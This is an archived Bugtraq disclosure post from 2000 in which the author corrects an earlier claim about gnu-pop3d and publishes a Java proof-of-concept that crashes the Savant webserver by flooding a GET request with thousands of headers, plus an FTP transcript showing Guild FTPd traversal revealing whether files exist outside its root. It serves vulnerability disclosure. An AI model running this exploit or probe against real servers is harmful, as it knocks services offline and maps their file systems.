5263750 2000-07-10 10:58 /110 rader/ Postmaster
Mottagare: Bugtraq (import) <11666>
Ärende: gnu-pop3d (FTGate problem), Savant Webserver, Guild FTPd
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.BSF.4.10.10007081536560.12309-100000@unix.za.net>
Date: Sat, 8 Jul 2000 15:41:29 +0200
Reply-To: Andrew Lewis <wizdumb@UNIX.ZA.NET>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Andrew Lewis <wizdumb@UNIX.ZA.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Yo,
Errr... Sorry about saying gnu-pop3d had the same problem as FTGate -
don't know how that got in my list - I assume from posting after a
rather hectic party and before that vital cup of coffee the next
day. :) Apologies, all.
Anyway, I found a stack overflow in the Savant webserver the other
day - lemmee just paste the code I wrote here...
/* The MDMA Crew's proof-of-concept code for the buffer overflow in Savant
* Written by Wizdumb <wizdumb@leet.org || www.mdma.za.net/fk>
*
* The overflow occurs when the server recieves too many headers in the GET
* request. The results of the attack look something like...
*
* SAVANT caused an invalid page fault
* in module KERNEL32.DLL at 015f:bff87eb5.
*
* Registers:
*
* EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010212
* EBX=0119ff90 SS=0167 ESP=0109ffc4 EBP=010a0030
* ECX=010a01e4 DS=0167 ESI=8162f198 FS=20f7
* EDX=bff76859 ES=0167 EDI=010a020c GS=0000
*
* Bytes at CS:EIP:
* 53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
*
* Stack dump:
*
* Enjoy!
* Andrew Lewis aka. Wizdumb [03/07/2000]
*/
import java.io.*;
import java.net.*;
class savantstack {
public static void main(String[] args) throws IOException {
if (args.length != 1) {
System.out.println("Syntax: java savantstack [hostname/ip]");
System.exit(1); }
Socket soq = null;
PrintWriter white = null;
int i = 5000; // This should do fine :-)
soq = new Socket(args[0], 80);
white = new PrintWriter(soq.getOutputStream(), true);
System.out.print("Showing " + args[0] + " the phj33r :P ...");
white.print("GET /index.html HTTP/1.0");
for (int x = 0; x < i; x++) white.println("A:A");
white.println("\n");
System.out.println("Done!");
white.close();
soq.close(); } }
That's it. I also found a more minor vulnerability in Guild FTPd -
although directory transversal with GET can't be used to d/l files
outside of the FTP root directory, it can be used to see if files
exist. An example follows...
C:\wizdumb>ftp localhost Connected to kung-phusion. 220-GuildFTPD
FTP Server (c) 1999 220-Version 0.93i 220 Please enter your name:
User (kung-phusion:(none)): test 331 User name okay, Need password.
Password: 230 User logged in. ftp> cd .. 550 Access denied. ftp>
get ../nonexistant.txt 200 PORT command successful. 550 Access
denied. ftp> get ../autoexec.bat 200 PORT command successful. 150
Opening ascii mode data connection for \../autoexec.bat (1143 bytes).
425 Download failed. ftp> quit 221 Goodbye. Control connection
closed.
The SIZE command can also be used in a similar manner.
Anyway, I'm outta here again...
Cheers,
Andrew Lewis aka. Wizdumb [MDMA]
wizdumb@leet.org
www.mdma.za.net/fk
(5263750) ------------------------------------------(Ombruten)